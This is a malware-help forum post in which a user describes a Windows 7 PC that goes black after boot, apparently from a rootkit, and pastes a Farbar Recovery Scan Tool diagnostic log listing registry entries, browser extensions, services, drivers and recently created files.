Windows turns black after startup (possible due to esvhnqcv.sys)


29 replies to this topic

#1 mortn


Posted 18 March 2018 - 12:34 PM

Hello!

It seems that I recently got infected with a virus/malicious software on my desktop computer. Upon starting the computer and entering Windows, everything turns black after a few seconds, and I can't do anything other than turn the computer off (by pressing the Power button). In addition to this, a lot of programs seem to have installed themselves as well, although I am not sure if these are truly dangerous programs or just bloatware or something similar. They did, however, get installed at the same time as the infection. I think Malwarebytes Anti-Malware was also uninstalled by the event, but I am not sure at this point (since I reinstalled it to run some standard scans). My System Restore Points seem to have been removed as well. As of now, I have unplugged the Ethernet cable from the computer.

Since I can't really do anything in normal mode, I have tried some things in fail-safe mode (without network connection):

  • Running several full (and manually updated) Malwarebytes Anti-Malware scans (including root kits).
  • Running several full Microsoft Security Essentials scans
  • Running Malwarebytes AdwCleaner
  • Running (and manually updating (as best as I managed)) Spybot Search and Destroy 2.0
  • Running Malwarebytes Anti-Rootkit

I also tried to start in normal mode with just the basic startups via msconfig, but that did not change anything.

During the scans, several infected files were found and removed, all of which were located on the C-disk (Windows partition). Unfortunately, I did not save any of the logs. However, a certain "esvhnqcv.sys", labeled as a rootkit by Malwarebytes, was not successfully removed (despite several reboots) until I ran Malwarebytes Anti-Rootkit, after which all scans come up empty. Even though every scan shows up empty, I'm assuming that the system is in fact quite heavily infected.

Please note that the attached FRST logs are from running the program in fail-safe mode, since I can't navigate Windows long enough in normal mode to complete a scan.

I am at a loss here, since I really don't know how to approach this. I would be very grateful if anyone would offer their time and expertise. I will gladly make a donation for your help.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (18-03-2018 09:05:41)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dinotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Install Spybot - Search & Destroy] => "G:\spybotsd-2.6.46.exe"
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-02]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-02]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
S2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
S2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
S2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
S2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
S3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
S3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-18 09:03 - 2018-03-18 09:05 - 000000000 ____D C:\FRST
2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 10:21 - 2018-03-02 11:15 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-02 10:27 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 08:11 - 2018-03-02 11:15 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000000000 ____D C:\Windows\LastGood
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:14 - 2018-03-18 09:02 - 001178610 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:09 - 2018-03-01 17:09 - 000003060 _____ C:\Windows\System32\Tasks\OHurYzwpfZsLsh
2018-03-01 17:09 - 2018-03-01 17:09 - 000002872 _____ C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002860 _____ C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002850 _____ C:\Windows\System32\Tasks\wXkHuguozQzssiw2
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
